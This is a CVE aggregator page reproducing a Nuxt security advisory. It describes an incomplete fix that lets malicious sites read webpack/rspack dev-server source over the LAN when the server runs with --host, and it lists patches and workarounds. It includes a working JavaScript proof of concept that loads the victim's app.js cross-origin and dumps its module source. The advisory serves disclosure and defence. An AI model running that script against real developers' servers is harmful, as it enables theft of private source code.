CVE-2026-45670

MEDIUMPre-NVD 0.0

0.0

Nuxt: Dev server exposes built source over LAN to malicious sites (incomplete fix for GHSA-4gf7-ff8x-hq99)

Summary

This is an incomplete fix for GHSA-4gf7-ff8x-hq99. Source code may be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. nuxt dev --host) and the developer opens a malicious site on the same network.

Details

The fix for GHSA-4gf7-ff8x-hq99 relied on Sec-Fetch-Mode and Sec-Fetch-Site headers. Because these headers are sent by the browsers only for potentially trustworthy origins, the check is able to bypass for non-potentially trustworthy origins.

Since the attack requires the website to be accessible via a non-potentially trustworthy origin, only apps that are using --host is affected.

PoC

Create a nuxt project with webpack / rspack builder.
Run npm run dev
Open http://localhost:3000
Run the script below in a web site that has a different origin.
You can see the source code output in the document and the devtools console.

const script = document.createElement('script')
script.src = 'http://192.168.0.31:3000/_nuxt/app.js' // NOTE: replace with the IP address the dev server listens to
script.addEventListener('load', () => {
  const key = Object.keys(window).find(k => k.startsWith("webpackChunk"))
  for (const page in window[key]) {
    const moduleList = window[key][page][1]
    console.log(moduleList)    for (const key in moduleList) {
      const p = document.createElement('p')
      const title = document.createElement('strong')
      title.textContent = key
      const code = document.createElement('code')
      code.textContent = moduleList[key].toString()
      p.append(title, ':', document.createElement('br'), code)
      document.body.appendChild(p)
    }
  }
})
document.head.appendChild(script)

(This script is the similar with GHSA-4gf7-ff8x-hq99 except for the script.src and the global variable name)

Impact

Users using webpack / rspack builder may get the source code stolen by malicious websites if it uses a predictable host and also is using --host.

This vulnerability does not affect Chrome 142+ (and other Chromium based browsers) users due to the local network access restriction feature.

Patches

Fixed in nuxt@4.4.6 and nuxt@3.21.6 by #35051. The dev-middleware same-origin check now falls back to comparing the request's Origin / Referer host against Host when Sec-Fetch-* headers are absent, closing the non-trustworthy-origin bypass.

The fix only ships for the @nuxt/webpack-builder and @nuxt/rspack-builder packages. The default Vite builder was not affected.

Workarounds

If you cannot upgrade immediately:

Don't use nuxt dev --host. Bind the dev server to localhost (the default) and tunnel from other devices via SSH or a reverse proxy that enforces same-origin checks.
Use Chrome 142+ or another Chromium-based browser that enforces local network access restrictions.
Switch to the Vite builder for development.

CVSS v3: —
EG Score: 0.0(none)
EPSS: —
KEV: Not listed

Published

May 19, 2026

Last Modified

May 19, 2026

Vendor Advisories for CVE-2026-45670(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

GHSA-6m52-m754-pw2g
GitHub Security AdvisoriesMedium
Nuxt: Dev server exposes built source over LAN to malicious sites (incomplete fix for GHSA-4gf7-ff8x-hq99)

Data Freshness Timeline

(refreshed 0× in last 7d / 1× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

2026-05-24 06:14 UTCEG score recompute

Frequently asked(3)

What is CVE-2026-45670?

CVE-2026-45670 is a medium vulnerability published on May 19, 2026. Nuxt: Dev server exposes built source over LAN to malicious sites (incomplete fix for GHSA-4gf7-ff8x-hq99) Summary This is an incomplete fix for GHSA-4gf7-ff8x-hq99. Source code may be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address…

When was CVE-2026-45670 disclosed?

CVE-2026-45670 was first published in the National Vulnerability Database on May 19, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.

How do I remediate CVE-2026-45670?

Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-45670, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

See which npm, PyPI, Go, and Maven packages are affected by CVE-2026-45670

Explore →

Is Your Infrastructure Affected by CVE-2026-45670?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.

Start Free Scan →Browse All CVEs